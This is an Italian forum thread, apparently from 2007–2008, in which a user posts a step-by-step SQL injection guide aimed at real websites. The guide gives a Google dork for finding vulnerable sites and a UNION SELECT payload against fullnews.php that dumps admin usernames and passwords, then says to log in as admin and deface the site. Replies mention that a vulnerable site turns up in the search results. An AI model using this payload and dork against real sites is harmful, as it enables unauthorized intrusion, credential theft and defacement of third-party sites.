Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida SQL Injection

InfernoHacker

InfernoHacker

Utente Master
Autore del topic
18 Agosto 2007
2.775
0
Miglior risposta
0
Salve,oggi vi scrivo questa guida per insegnarvi ad eseguire la tecnica SQL Injection.
Con questa tecnica è possibile impossessarsi dell'Admin e quindi avere la possibilità di defacciarlo.

Premessa : Non tutti i siti sono vulnerabili,perciò dovrete andare a tentativi o usare uno scanner .

Altra Premessa : Non mi assumo la responsabilità dei danni arrecati ai siti Web,voi siete gli unici responsabili delle vostre azioni e dell'uso che nè farete della guida.

Iniziamo andando su GOOGLE (
Perfavore, Entra oppure Registrati per vedere i Link!
) e scrivendo questa DORK per trovare siti vulnerabili :

"Browse with Interactive Map" (con le apici)

Adesso proviamo qualche sito a caso.

Apriamolo e scriviamo sul link

Perfavore, Entra oppure Registrati per vedere i Link!
- co.uk - ecc... )/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

Perciò se il sito fosse paperinomuore.it dovrete scrivere

Perfavore, Entra oppure Registrati per vedere i Link!


Se tutto andrà bene sulla pagina verrà scritto

user:password

ad esempio mettiamo che User sia PLUTO e password 123 voi vedrete apparire

PLUTO:123

Adesso effettuiamo il Login con PLUTO (che è l'ADMIN,perchè vedrete l'USER dell'Admin ) e potrete fare ciò che volete.

Niente Lamerate.

FONTE : ME

Hacked By HaCk-GaMe (lol)
 
NON SU TUTTI I SITI FUNZIONA
Non puoi pretendere i trovare un sito vulnerabile in 3 secondi

PS : alla 4^ c'è un sito vulnerabile ;)
 
intendi 4a voce o 4a pagina?

EDIT:
grazie, ho capito cm si fa
prometto di non lamerare xD
 
Ultima modifica:
InfernoHacker ha detto:
Ti sei accorto che la discussione è addirittura del 2008 ?
Clicca per espandere...

Lo so perfettamente, ma è la prima volta che vedo questa discussione, quindi ho pensato di commentare. Potrebbe anche servire ad altri che in questo momento stanno cercando una cosa simile, non è un male commentare TOPIC VECCHI anche se il Regolamento non lo concede, ma come detto prima, a qualcuni potrebbe servire lo stesso.
 
System32 ha detto:
Lo so perfettamente, ma è la prima volta che vedo questa discussione, quindi ho pensato di commentare. Potrebbe anche servire ad altri che in questo momento stanno cercando una cosa simile, non è un male commentare TOPIC VECCHI anche se il Regolamento non lo concede, ma come detto prima, a qualcuni potrebbe servire lo stesso.
Clicca per espandere...

Il regolamento lo concede purchè il commento sia sensato e attinente all'argomento,ho solamente precisato che è del 2008.
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro